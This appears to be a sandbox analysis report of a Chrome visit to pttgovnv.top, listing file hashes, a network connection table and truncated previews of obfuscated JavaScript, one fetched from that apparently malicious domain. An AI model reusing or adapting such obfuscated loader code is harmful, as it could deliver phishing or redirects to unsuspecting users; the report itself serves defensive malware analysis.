    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:ASCII text, with very long lines (52146)
    Category:dropped
    Size (bytes):53104
    Entropy (8bit):5.227530657260376
    Encrypted:false
    SSDEEP:1536:TMmDcX+V9NQhASRs39o2sBabuVV0cI7fxDRUZq:TRAX+7/RsBKuj0cI7VRUZq
    MD5:A776E06B72C85E797B740BD2D8B72177
    SHA1:178F266CB57B535F9026210BD0A81E2D4F661F54
    SHA-256:59E40E563B52ED0F9F6F98F299618ECCC9A75F47CFEE7B4125BBE5D548AD3C31
    SHA-512:80026AF0668053BF6BA7EC6BD5261F885CDDB06191E9EE2D60E8B05413FE579E44D9E6D24B682246209D3E08AA835917AF4B9BC50A2A4D265FC5F7DA6B16EE69
    Malicious:false
    Reputation:low
    Preview:const a9_0x13d023=a9_0x3647;(function(_0x1c0f4c,_0x5b4f7e){const _0x18c0e3=a9_0x3647,_0x35d09c=_0x1c0f4c();while(!![]){try{const _0xa80895=-parseInt(_0x18c0e3(0xfb))/0x1*(parseInt(_0x18c0e3(0x12e))/0x2)+parseInt(_0x18c0e3(0x19c))/0x3+-parseInt(_0x18c0e3(0x108))/0x4*(parseInt(_0x18c0e3(0x1aa))/0x5)+parseInt(_0x18c0e3(0x1a2))/0x6*(-parseInt(_0x18c0e3(0x1c8))/0x7)+-parseInt(_0x18c0e3(0x16a))/0x8+parseInt(_0x18c0e3(0x1be))/0x9+-parseInt(_0x18c0e3(0x14a))/0xa*(-parseInt(_0x18c0e3(0x106))/0xb);if(_0xa80895===_0x5b4f7e)break;else _0x35d09c['push'](_0x35d09c['shift']());}catch(_0x5b3a28){_0x35d09c['push'](_0x35d09c['shift']());}}}(a9_0x5403,0x5a626));import{s as a9_0x30f9d7,u as a9_0x1f3b06,x as a9_0x2ee3d1,r as a9_0x4c70bc,n as a9_0x803a5b,y as a9_0x3e60a4,d as a9_0x255cc3,z as a9_0x46165c,A as a9_0x2b3cd7,a as a9_0x5a4862,w as a9_0x273496}from'./index-f5457718.js';/*!. * vue-router v4.1.6. * (c) 2022 Eduardo San Martin Morote. * @license MIT. */.const G=typeof window<'u';function nt(_0xe
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:ASCII text, with very long lines (1965), with no line terminators
    Category:downloaded
    Size (bytes):1965
    Entropy (8bit):5.287237545046552
    Encrypted:false
    SSDEEP:24:cP2k+LBK+qcy+SDaOrKhbM4O7IlH2VZ5RJR7RRRdilxXmxV4y5T0zxHI2MRRtMav:99Zqh+GOOMlH2Si35A1HpMdtZAlA
    MD5:D66FEBB5B4397732135B71831C138AFD
    SHA1:B2A462BAD03E25C4109424B80B8C3F1CC7055558
    SHA-256:E24C314BD212C166353D089356F9296351B7D31D88E7D386197443A970BA6AB5
    SHA-512:8C933EBA937FD28674F709FE7E2B342877D37F7B1A269EC09023EB98891D6E13402C0F14793DEA90C2CF1B510A6EFFCA317BBAC43EAC30A2336327EFB6D2448F
    Malicious:false
    Reputation:low
    URL:https://pttgovnv.top/help/assets/09bf01f8JxKnW.js
    Preview:function a0_0x1726(){const _0x590fb6=['toString','apply','1217280mFYShg','745101HtGRyz','5kGzjZf','(((.+)+)+)','search','2144133WxxWWe','remove','1368812WqIuRv','noopener','click','2226574VjkNhh','449368jzjbqt','4256976MihuCv','append','body','rel','constructo'];a0_0x1726=function(){return _0x590fb6;};return a0_0x1726();}(function(_0x3fc008,_0x3d9ca0){const _0x55189d=a0_0x1055,_0x3a6928=_0x3fc008();while(!![]){try{const _0x29b996=parseInt(_0x55189d(0xcd))/0x1+-parseInt(_0x55189d(0xc4))/0x2+parseInt(_0x55189d(0xd1))/0x3+parseInt(_0x55189d(0xd3))/0x4*(parseInt(_0x55189d(0xce))/0x5)+-parseInt(_0x55189d(0xc5))/0x6+-parseInt(_0x55189d(0xc3))/0x7+-parseInt(_0x55189d(0xcc))/0x8;if(_0x29b996===_0x3d9ca0)break;else _0x3a6928['push'](_0x3a6928['shift']());}catch(_0x571e3b){_0x3a6928['push'](_0x3a6928['shift']());}}}(a0_0x1726,0x61119));function a0_0x1055(_0xf64470,_0x4b0865){const _0x32fcc2=a0_0x1726();return a0_0x1055=function(_0xb13448,_0x57136d){_0xb13448=_0xb13448-0xc2;let _0x172600=_0x32fcc
    No static file info
    TimestampSource PortDest PortSource IPDest IP
    Sep 2, 2024 00:28:05.826483011 CEST49675443192.168.2.4173.222.162.32
    Sep 2, 2024 00:28:15.435050011 CEST49675443192.168.2.4173.222.162.32
    Sep 2, 2024 00:28:16.263340950 CEST49735443192.168.2.4172.67.83.132
    Sep 2, 2024 00:28:16.263372898 CEST44349735172.67.83.132192.168.2.4
    Sep 2, 2024 00:28:16.263468981 CEST49735443192.168.2.4172.67.83.132
    Sep 2, 2024 00:28:16.263672113 CEST49735443192.168.2.4172.67.83.132
    Sep 2, 2024 00:28:16.263690948 CEST44349735172.67.83.132192.168.2.4
    Sep 2, 2024 00:28:16.809832096 CEST44349735172.67.83.132192.168.2.4
    Sep 2, 2024 00:28:16.810924053 CEST49735443192.168.2.4172.67.83.132
    Sep 2, 2024 00:28:16.810940981 CEST44349735172.67.83.132192.168.2.4
    Sep 2, 2024 00:28:16.812283993 CEST44349735172.67.83.132192.168.2.4
    Sep 2, 2024 00:28:16.812366009 CEST49735443192.168.2.4172.67.83.132
    Sep 2, 2024 00:28:16.814055920 CEST49735443192.168.2.4172.67.83.132
    Sep 2, 2024 00:28:16.814142942 CEST44349735172.67.83.132192.168.2.4
    Sep 2, 2024 00:28:16.814536095 CEST49735443192.168.2.4172.67.83.132
    Sep 2, 2024 00:28:16.814546108 CEST44349735172.67.83.132192.168.2.4
    Sep 2, 2024 00:28:16.856189966 CEST49735443192.168.2.4172.67.83.132
    Sep 2, 2024 00:28:16.927894115 CEST44349735172.67.83.132192.168.2.4
    Sep 2, 2024 00:28:16.927975893 CEST44349735172.67.83.132192.168.2.4
    Sep 2, 2024 00:28:16.928042889 CEST49735443192.168.2.4172.67.83.132
    Sep 2, 2024 00:28:16.931138992 CEST49735443192.168.2.4172.67.83.132
    Sep 2, 2024 00:28:16.931164980 CEST44349735172.67.83.132192.168.2.4
    Sep 2, 2024 00:28:17.322401047 CEST4973880192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:17.322896004 CEST4973980192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:17.327291965 CEST8049738104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:17.327405930 CEST4973880192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:17.327698946 CEST8049739104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:17.327754021 CEST4973980192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:17.487498999 CEST4973980192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:17.492383003 CEST8049739104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:17.770791054 CEST8049739104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:17.811048031 CEST4973980192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:18.041317940 CEST49740443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:18.041367054 CEST44349740104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:18.041435003 CEST49740443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:18.042426109 CEST49740443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:18.042444944 CEST44349740104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:18.499717951 CEST44349740104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:18.502567053 CEST49740443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:18.502593994 CEST44349740104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:18.503741980 CEST44349740104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:18.503803968 CEST49740443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:18.579890013 CEST49740443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:18.580082893 CEST44349740104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:18.580214977 CEST49740443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:18.580229998 CEST44349740104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:18.623816013 CEST49740443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:18.986694098 CEST44349740104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:18.987238884 CEST44349740104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:18.987715006 CEST49741443192.168.2.4142.250.185.132
    Sep 2, 2024 00:28:18.987746000 CEST44349741142.250.185.132192.168.2.4
    Sep 2, 2024 00:28:18.987783909 CEST49740443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:18.987884045 CEST49741443192.168.2.4142.250.185.132
    Sep 2, 2024 00:28:18.988593102 CEST49741443192.168.2.4142.250.185.132
    Sep 2, 2024 00:28:18.988604069 CEST44349741142.250.185.132192.168.2.4
    Sep 2, 2024 00:28:18.991947889 CEST49740443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:18.991972923 CEST44349740104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:18.992008924 CEST49740443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:18.992290020 CEST49740443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:18.996253014 CEST49742443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:18.996288061 CEST44349742104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:18.996385098 CEST49742443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:18.997555971 CEST49742443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:18.997571945 CEST44349742104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:19.164324999 CEST49743443192.168.2.4184.28.90.27
    Sep 2, 2024 00:28:19.164359093 CEST44349743184.28.90.27192.168.2.4
    Sep 2, 2024 00:28:19.164453983 CEST49743443192.168.2.4184.28.90.27
    Sep 2, 2024 00:28:19.168709040 CEST49743443192.168.2.4184.28.90.27
    Sep 2, 2024 00:28:19.168728113 CEST44349743184.28.90.27192.168.2.4
    Sep 2, 2024 00:28:19.451348066 CEST44349742104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:19.455081940 CEST49742443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:19.455092907 CEST44349742104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:19.455420971 CEST44349742104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:19.456501961 CEST49742443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:19.456559896 CEST44349742104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:19.459923029 CEST49742443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:19.500499964 CEST44349742104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:19.602318048 CEST44349741142.250.185.132192.168.2.4
    Sep 2, 2024 00:28:19.602684021 CEST49741443192.168.2.4142.250.185.132
    Sep 2, 2024 00:28:19.602693081 CEST44349741142.250.185.132192.168.2.4
    Sep 2, 2024 00:28:19.603749990 CEST44349741142.250.185.132192.168.2.4
    Sep 2, 2024 00:28:19.604020119 CEST49741443192.168.2.4142.250.185.132
    Sep 2, 2024 00:28:19.739586115 CEST44349742104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:19.739635944 CEST44349742104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:19.739721060 CEST44349742104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:19.739721060 CEST49742443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:19.739809990 CEST49742443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:19.741538048 CEST49742443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:19.741554976 CEST44349742104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:19.770831108 CEST44349743184.28.90.27192.168.2.4
    Sep 2, 2024 00:28:19.770903111 CEST49743443192.168.2.4184.28.90.27
    Sep 2, 2024 00:28:19.774395943 CEST49743443192.168.2.4184.28.90.27
    Sep 2, 2024 00:28:19.774401903 CEST44349743184.28.90.27192.168.2.4
    Sep 2, 2024 00:28:19.774635077 CEST44349743184.28.90.27192.168.2.4
    Sep 2, 2024 00:28:19.819313049 CEST49743443192.168.2.4184.28.90.27
    Sep 2, 2024 00:28:19.819842100 CEST49743443192.168.2.4184.28.90.27
    Sep 2, 2024 00:28:19.864505053 CEST44349743184.28.90.27192.168.2.4
    Sep 2, 2024 00:28:20.017246962 CEST49741443192.168.2.4142.250.185.132
    Sep 2, 2024 00:28:20.017412901 CEST44349741142.250.185.132192.168.2.4
    Sep 2, 2024 00:28:20.047236919 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.047290087 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.047348976 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.063251972 CEST49741443192.168.2.4142.250.185.132
    Sep 2, 2024 00:28:20.063265085 CEST44349741142.250.185.132192.168.2.4
    Sep 2, 2024 00:28:20.072109938 CEST44349743184.28.90.27192.168.2.4
    Sep 2, 2024 00:28:20.072165012 CEST44349743184.28.90.27192.168.2.4
    Sep 2, 2024 00:28:20.072216988 CEST49743443192.168.2.4184.28.90.27
    Sep 2, 2024 00:28:20.080846071 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.080863953 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.082201004 CEST49745443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.082228899 CEST44349745104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.082289934 CEST49745443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.082786083 CEST49745443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.082798958 CEST44349745104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.085490942 CEST49743443192.168.2.4184.28.90.27
    Sep 2, 2024 00:28:20.085501909 CEST44349743184.28.90.27192.168.2.4
    Sep 2, 2024 00:28:20.085539103 CEST49743443192.168.2.4184.28.90.27
    Sep 2, 2024 00:28:20.085544109 CEST44349743184.28.90.27192.168.2.4
    Sep 2, 2024 00:28:20.106363058 CEST49741443192.168.2.4142.250.185.132
    Sep 2, 2024 00:28:20.120202065 CEST49746443192.168.2.4184.28.90.27
    Sep 2, 2024 00:28:20.120214939 CEST44349746184.28.90.27192.168.2.4
    Sep 2, 2024 00:28:20.120279074 CEST49746443192.168.2.4184.28.90.27
    Sep 2, 2024 00:28:20.120524883 CEST49746443192.168.2.4184.28.90.27
    Sep 2, 2024 00:28:20.120537043 CEST44349746184.28.90.27192.168.2.4
    Sep 2, 2024 00:28:20.669574976 CEST44349745104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.669872046 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.672785997 CEST49745443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.672815084 CEST44349745104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.673070908 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.673093081 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.673149109 CEST44349745104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.673434019 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.674329042 CEST49745443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.674393892 CEST44349745104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.674669027 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.674729109 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.675066948 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.675067902 CEST49745443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.716510057 CEST44349745104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.716649055 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.716662884 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.721539021 CEST44349746184.28.90.27192.168.2.4
    Sep 2, 2024 00:28:20.721735954 CEST49746443192.168.2.4184.28.90.27
    Sep 2, 2024 00:28:20.723850965 CEST49746443192.168.2.4184.28.90.27
    Sep 2, 2024 00:28:20.723855972 CEST44349746184.28.90.27192.168.2.4
    Sep 2, 2024 00:28:20.724090099 CEST44349746184.28.90.27192.168.2.4
    Sep 2, 2024 00:28:20.727127075 CEST49746443192.168.2.4184.28.90.27
    Sep 2, 2024 00:28:20.768501043 CEST44349746184.28.90.27192.168.2.4
    Sep 2, 2024 00:28:20.808003902 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.808053017 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.808087111 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.808128119 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.808134079 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.808146954 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.808166027 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.808187008 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.808193922 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.808218956 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.808223963 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.808923960 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.808958054 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.809020996 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.809020996 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.809030056 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.813397884 CEST44349745104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.813481092 CEST44349745104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.813755035 CEST49745443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.840517998 CEST49745443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.840543032 CEST44349745104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.850409031 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.850423098 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.894175053 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.894216061 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.894253969 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.894279003 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.894293070 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.894319057 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.894541025 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.894571066 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.894607067 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.894625902 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.894629955 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.894660950 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.895252943 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.895291090 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.895313978 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.895318031 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.895375013 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.895401001 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.895404100 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.895694017 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.895703077 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.896248102 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.896325111 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.896354914 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.896359921 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.896392107 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.896411896 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.896418095 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.896490097 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.897166014 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.897236109 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.897392035 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.897397041 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.950542927 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.979078054 CEST44349746184.28.90.27192.168.2.4
    Sep 2, 2024 00:28:20.979151964 CEST44349746184.28.90.27192.168.2.4
    Sep 2, 2024 00:28:20.979264021 CEST49746443192.168.2.4184.28.90.27
    Sep 2, 2024 00:28:20.982275009 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.982362032 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.982394934 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.982419968 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.982426882 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.982702017 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.982727051 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.982733011 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.982821941 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.982882023 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.983268023 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.983273983 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.983365059 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.983369112 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.983405113 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.983439922 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.984232903 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.984239101 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.984380007 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.984415054 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.984441996 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.984453917 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.984463930 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.985299110 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.985333920 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.985364914 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.985369921 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.985394001 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.986340046 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.986378908 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.986408949 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.986413002 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.986434937 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.986449957 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.986866951 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.986870050 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.986947060 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.987066984 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.987179041 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.987216949 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.987251997 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.987277985 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:20.987282991 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:20.987308979 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.013014078 CEST49746443192.168.2.4184.28.90.27
    Sep 2, 2024 00:28:21.013036013 CEST44349746184.28.90.27192.168.2.4
    Sep 2, 2024 00:28:21.013498068 CEST49746443192.168.2.4184.28.90.27
    Sep 2, 2024 00:28:21.013504982 CEST44349746184.28.90.27192.168.2.4
    Sep 2, 2024 00:28:21.037055969 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.066870928 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.066931009 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.066955090 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.066971064 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.066994905 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.067013025 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.067042112 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.067048073 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.067080021 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.067622900 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.067809105 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.067815065 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.067862034 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.067888975 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.067893982 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.067918062 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.067970037 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.068069935 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.068075895 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.068176031 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.068399906 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.068542957 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.068566084 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.068572044 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.068594933 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.068672895 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.068706036 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.068728924 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.068734884 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.068753004 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.068787098 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.069395065 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.069520950 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.069550037 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.069555998 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.069619894 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.069619894 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.069657087 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.069917917 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.070354939 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.070451975 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.070497990 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.070502996 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.070533037 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.070630074 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.070668936 CEST44349744104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:21.070696115 CEST49744443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:21.070700884 CEST44349744104.21.47.250192.168.2.4
